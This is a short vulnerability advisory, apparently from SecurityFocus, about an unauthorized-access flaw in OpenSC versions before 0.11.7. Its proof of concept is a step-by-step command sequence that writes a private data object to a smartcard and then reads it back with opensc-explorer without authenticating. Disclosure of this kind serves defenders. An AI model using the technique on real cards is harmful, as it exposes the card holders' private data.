30 lines
No EOL
901 B
Text
30 lines
No EOL
901 B
Text
source: https://www.securityfocus.com/bid/33922/info
|
|
|
|
OpenSC is prone to an unauthorized-access vulnerability.
|
|
|
|
Attackers can exploit this issue to gain unauthorized access to private data, which may lead to other attacks.
|
|
|
|
Versions prior to OpenSC 0.11.7 are vulnerable.
|
|
|
|
The following proof of concept is available:
|
|
|
|
create a file with a secret:
|
|
echo "This is my secret data" > secret-file
|
|
|
|
To initialise a blank card:
|
|
pkcs15-init --create-pkcs15 --use-default-transport-keys --profile pkcs15+onepin --pin 123456 --puk 78907890
|
|
|
|
To write a private data object to the card:
|
|
pkcs11-tool --label "my secret" --type data --write-object secret-file
|
|
--private --login --pin 12345
|
|
|
|
To see all objects on the card:
|
|
pkcs15-tool --dump
|
|
This will list the data object, including the path it is stored, e.g.:
|
|
"Path: 3f0050154701"
|
|
|
|
To access such an object with low-level tools:
|
|
|
|
opensc-explorer
|
|
cd 5015
|
|
get 4701 |